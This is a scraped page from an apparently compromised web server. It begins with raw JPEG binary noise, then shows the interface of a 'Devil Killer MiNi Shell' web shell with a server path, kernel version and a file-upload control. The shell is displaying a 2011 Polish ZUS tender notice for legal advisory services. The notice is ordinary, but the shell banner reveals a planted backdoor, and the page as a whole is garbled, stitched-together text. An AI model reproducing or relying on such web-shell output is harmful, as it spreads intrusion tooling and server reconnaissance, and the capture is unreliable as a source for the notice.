JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111028/356924-N-2011.html

<p class="kh_header"><b>Warszawa: Świadczenie pomocy prawnej w Centrali Zakładu Ubezpieczeń Społecznych.</b><br>
<b>Numer ogłoszenia: 356924 - 2011; data zamieszczenia: 28.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych , ul. Szamocka 3, 5, 01-748 Warszawa, woj. mazowieckie, tel. 022 667 17 04, 667 17 05, faks 022 667 17 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie pomocy prawnej w Centrali Zakładu Ubezpieczeń Społecznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie pomocy prawnej w Centrali Zakładu Ubezpieczeń Społecznych w następującym zakresie:
1) udzielanie porad prawnych,
2) sporządzanie projektów umów,
3) sporządzanie opinii prawnych, w tym dotyczących zawieranych umów,
4) sporządzanie pism procesowych dokumentujących stanowisko Zamawiającego w postępowaniu przed sądami i urzędami oraz zastępstwo prawne i procesowe,
5) udział w negocjacjach w celu zawarcia umowy i innych czynnościach prawnych według potrzeb Zamawiającego.

Zamówienie obejmuje 2 części:

Część 1

Świadczenie pomocy prawnej w zakresie zarządzania środkami funduszy, których dysponentem jest Zamawiający, obejmujące w szczególności:
1. Sporządzanie opinii prawnych w zakresie interpretacji i stosowania przepisów zawartych w:
Ustawie o systemie ubezpieczeń społecznych, 
Ustawie o finansach publicznych,
Ustawie Prawo zamówień publicznych,
Ustawie Prawo bankowe,
Ustawie o obrocie instrumentami finansowymi,
Ustawie Prawo pocztowe,
Rozporządzeniu Ministra Pracy i Polityki Społecznej w sprawie lokowania środków Funduszu Rezerwy Demograficznej.

W przypadku propozycji zmian bądź wprowadzenia zmian w powyższych aktach prawnych, sporządzanie opinii w zakresie wpływu wprowadzonych zmian na:
zarządzanie płynnością finansową Funduszu Ubezpieczeń Społecznych (FUS), Zakładu Ubezpieczeń Społecznych (ZUS), Funduszu Emerytur Pomostowych (FEP) oraz Funduszu Rezerwy Demograficznej (FDR),
obsługę rachunków bankowych FUS, ZUS, FEP oraz FRD,
zarządzanie portfelem kredytowym oraz zawieranie umów kredytowych,
lokowanie nadwyżek finansowych FUS, ZUS, FEP oraz FRD,
opracowanie i prezentowanie planów, do których sporządzenia jako dysponent zobowiązany jest Zakład,
dokonywanie zmian w planach w okresie ich realizacji.

2. Opracowanie oraz opiniowanie umów zawieranych pomiędzy ZUS 
a podmiotami zewnętrznymi w następującym zakresie:
umowy kredytowe,
umowy dotyczącej rachunków bankowych,
umowy o świadczenie usług powierniczych,
umowy o lokowanie środków finansowych,
umowy zakupu/sprzedaży papierów wartościowych oraz akcji,
umowy pożyczki,
umowy o dostarczanie serwisów informacyjnego oraz transakcyjnego.

3. Uczestniczenie w procesie negocjacji warunków współpracy z podmiotami zewnętrznymi.

4. Sporządzanie opinii do otrzymywanych przez Zakład projektów aktów normatywnych, obejmujących zagadnienia będące przedmiotem regulacji ww. ustaw.

5. Sporządzanie opinii i projektów zmian w podejmowanych przez Zakład Ubezpieczeń Społecznych inicjatywach mających na celu aktualizację lub zmianę obowiązujących przepisów prawnych lub powstanie nowych aktów normatywnych, obejmujących zagadnienia będące przedmiotem regulacji ww. ustaw.

6.  Sporządzanie opinii z zakresu rachunkowości.

7. Sporządzanie opinii w zakresie aktualizacji lub zmian wewnętrznych aktów prawnych obowiązujących w ZUS oraz związanych z tym pełnomocnictw oraz upoważnień.

8. Reprezentowanie Zamawiającego i sporządzanie pism procesowych dokumentujących stanowisko Zamawiającego w postępowaniu przez sądami i urzędami oraz zastępstwo prawne i procesowe.


Część 2

Świadczenie pomocy prawnej w zakresie ochrony dóbr osobistych, obejmujące w szczególności:
1. Sporządzanie opinii prawnych w zakresie interpretacji i stosowania przepisów zawartych w : 
Ustawie Prawo prasowe, 
Ustawie o prawie autorskim i prawach pokrewnych, 
Ustawie o dostępie do informacji publicznej,
Kodeksie cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych,
Kodeksie postępowania cywilnego i pozostałych aktach prawnych mających związek 
z działaniami podejmowanymi w powyższym zakresie.
2. Opracowywanie i występowanie w imieniu ZUS z przedsądowymi wezwaniami wydawcy, redakcji, redaktorów naczelnych i dziennikarzy do publikacji przeprosin, związanych z:
Ustawą Prawo prasowe, 
Ustawą o prawie autorskim i prawach pokrewnych, 
Kodeksem cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych,
Kodeksem postępowania cywilnego i pozostałymi aktami prawnymi mającymi związek z działaniami podejmowanymi w powyższym zakresie.
3. Świadczenie pomocy prawnej, związanej z Ustawą Prawo prasowe, Ustawą o prawie autorskim i prawach pokrewnych, ustawie o dostępie do informacji publicznej, Kodeksem cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych, Kodeksem postępowania cywilnego oraz innych aktach prawnych związanych z działaniami podejmowanymi w przedmiotowym zakresie, w tym:
1) prowadzenie postępowań sądowych o przymuszenie do zamieszczenia przeprosin - w przypadku odmowy dobrowolnej publikacji,
2) występowanie w imieniu ZUS z żądaniami publikacji sprostowania/odpowiedzi prasowej,
3) prowadzenie postępowań sądowych o przymuszenie do zamieszczenia sprostowania/odpowiedzi prasowej w przypadku wcześniejszej odmowy,
4) prowadzenie postępowań sądowych w związku ze składaniem aktów oskarżenia przeciwko redaktorowi naczelnemu za uchylenie się od zamieszczenia sprostowań/odpowiedzi,
5) prowadzenie pertraktacji ugodowych,
6) występowanie ze skargami na naruszenia prawa strony do rozpoznania sprawy bez nieuzasadnionej zwłoki,
7) występowanie ze skargą kasacyjną (względnie ze skargą o stwierdzenie niezgodności z prawem prawomocnego orzeczenia) oraz reprezentacji procesowej przed Sądem Najwyższym,
8) występowanie w imieniu ZUS z żądaniami zaniechania naruszania praw autorskich, wydania uzyskanych korzyści i naprawienia wyrządzonej szkody,
9) prowadzenie postępowań sądowych o naruszenie autorskich praw majątkowych.
4. Opinie prawne dotyczące zagadnień związanych z wykorzystaniem praw autorskich, w związku z zawieranymi przez Zakład umowami na produkcję radiowych i telewizyjnych audycji o charakterze poradniczym oraz innymi przedsięwzięciami edukacyjnymi podejmowanymi przez ZUS.

Termin wykonania dla każdej części zamówienia -  świadczenie pomocy prawnej przez okres od daty zawarcia umowy ramowej do 31.12.2013 r. lub do wyczerpania kwoty z podatkiem VAT, jaką Zamawiający przeznaczył na sfinansowanie danej części zamówienia, na którą została zawarta umowa ramowa, jeśli nastąpi to przed 31.12.2013 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 zamówienia.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1) W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, co najmniej 2 usługi świadczenia pomocy prawnej, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych z zakresu finansów publicznych.

2) W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, co najmniej 3 usługi świadczenia pomocy prawnej, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych, w tym co najmniej:
- 2 usługi z zakresu prawa bankowego,
- 1 usługę z zakresu Ustawy o obrocie instrumentami finansowymi.

Spełnienie w/w warunków zostanie ocenione na podstawie:
1) Wykazu wykonywanych lub wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług świadczenia pomocy prawnej, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych z zakresu finansów publicznych, z podaniem przedmiotu, odbiorców i dat wykonania (sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ), wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.

2) Wykazu wykonywanych lub wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usług świadczenia pomocy prawnej, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych, w tym co najmniej:
- 2 usług z zakresu prawa bankowego,
- 1 usługi z zakresu Ustawy o obrocie instrumentami finansowymi, 
z podaniem przedmiotu, odbiorców i dat wykonania (sporządzony wg wzoru stanowiącego załącznik nr 5A do SIWZ), wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.

Część 2 zamówienia.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, co najmniej 3 usługi świadczenia  pomocy prawnej,  każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych oraz zastępstwie procesowym, w sprawach dotyczących ochrony dóbr osobistych, w tym co najmniej 2 usługi, w których zastępstwo procesowe obejmowało występowanie przed sądem I i II instancji.  

Spełnienie w/w warunku zostanie ocenione na podstawie wykazu wykonywanych lub wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 3 usług świadczenia pomocy prawnej, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych oraz zastępstwie procesowym, w sprawach dotyczących ochrony dóbr osobistych, w tym co najmniej 2 usług, w których zastępstwo procesowe obejmowało występowanie przed sądem I i II instancji, z podaniem przedmiotu, odbiorców i dat wykonania (sporządzony wg wzoru stanowiącego załącznik nr 6 do SIWZ), wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy dysponują co najmniej 2 osobami wpisanymi na listę radców prawnych lub listę adwokatów prowadzoną przez Okręgową Izbę Radców Prawnych/Okręgową Radę Adwokacką lub wpisanymi na listę prawników zagranicznych prowadzoną przez Okręgową Izbę Radców Prawnych/Okręgową Radę Adwokacką oraz posiadającymi aktualne ubezpieczenie od odpowiedzialności cywilnej z tytułu wykonywanego zawodu.

II. Część 1 zamówienia.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy dysponują co najmniej 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada następujące doświadczenie:           
świadczyła w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej po jednej usłudze, obejmującej łącznie udzielanie porad prawnych i sporządzanie opinii prawnych z zakresu:    
- finansów publicznych, 
- prawa bankowego, 
- Ustawy o obrocie instrumentami finansowymi. 

Spełnienie w/w warunku zostanie ocenione na podstawie wykazu dotyczącego co najmniej 2 osób, którymi dysponuje Wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada następujące doświadczenie (sporządzony wg wzoru stanowiącego załącznik nr 5B do SIWZ):
świadczyła w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej po jednej usłudze, obejmującej łącznie udzielanie porad prawnych i sporządzanie opinii prawnych z zakresu:    
- finansów publicznych
- prawa bankowego 
- Ustawy o obrocie instrumentami finansowymi,
z podaniem m. in. przedmiotu, odbiorców i dat wykonania.

II.a) Wykaz, o którym mowa w pkt II, musi zawierać informację o podstawie do dysponowania wskazanymi osobami.

II.b) Wykaz, o którym mowa w pkt II, musi zawierać oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, o których mowa w pkt I (treść oświadczenia zawarta jest w ww. Wykazie).

III. Część 2 zamówienia.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy dysponują co najmniej 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada następujące doświadczenie:           
świadczyła w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych oraz zastępstwie procesowym przed sądem I i II instancji w sprawach dotyczących ochrony dóbr osobistych. 

Spełnienie w/w warunku zostanie ocenione na podstawie wykazu dotyczącego co najmniej 2 osób, którymi dysponuje Wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada następujące doświadczenie (sporządzony wg wzoru stanowiącego załącznik nr 6A do SIWZ):
 świadczyła w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi, każda polegająca łącznie na udzielaniu porad prawnych, sporządzaniu opinii prawnych oraz zastępstwie procesowym przed sądem I i II instancji w sprawach dotyczących ochrony dóbr osobistych, z podaniem m. in. przedmiotu, odbiorców i dat wykonania.

III.a) Wykaz, o którym mowa w pkt III, musi zawierać informację o podstawie do dysponowania wskazanymi osobami.

III.b) Wykaz, o którym mowa w pkt III, musi zawierać oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, o których mowa w pkt I (treść oświadczenia zawarta jest w ww. Wykazie).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Oświadczenie potwierdzające spełnianie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Pzp.
3. Oświadczenie o braku podstaw do wykluczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian umowy w zakresie opisu przedmiotu zamówienia i jego cech oraz sposobu i terminu jego realizacji.
2. Zamawiający dopuszcza możliwość zmiany umowy w zakresie przeniesienia praw i obowiązków wynikających z umowy na osoby trzecie w zakresie cesji wierzytelności.
3. Zmiana umowy wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
4. Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności.
5. Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych. ul. Szamocka 3, 5, 01-748 Warszawa, skrzydło C, I piętro, pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2011 godzina 09:00, miejsce: siedziba Zamawiającego w Warszawie, ul. Szamocka 3, 5, skrzydło C, I piętro, pok. 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Postępowanie prowadzone jest w celu zawarcia umowy ramowej z zastosowaniem odpowiednio przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t. j. Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm.), dotyczących udzielania zamówień w trybie przetargu nieograniczonego i z zastosowaniem przepisów, dotyczących umów ramowych, określonych w w/w ustawie Prawo zamówień publicznych.

2. Zamawiający zawrze umowę ramową z trzema Wykonawcami dla każdej części zamówienia (chyba że oferty niepodlegające odrzuceniu złoży mniej Wykonawców), którzy w wyniku oceny ofert uzyskają najwyższą liczbę punktów, zgodnie z przyjętymi w SIWZ kryteriami oceny ofert (rozdz. VI SIWZ). W sytuacji gdy kilku Wykonawców otrzyma taką samą pozycję w kwalifikacji w wyniku uzyskania takiej samej liczby punktów, Zamawiający podpisze umowy ramowe z Wykonawcami, którzy zostali zakwalifikowani na pozycjach od pierwszej do trzeciej.

3. W przypadku wniesienia odwołania, Odwołujący przesyła kopię odwołania Zamawiającemu za pomocą faksu - wyłącznie na numer (022) 667-17-33/36 lub drogą elektroniczną - wyłącznie na adres bladoszm@zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
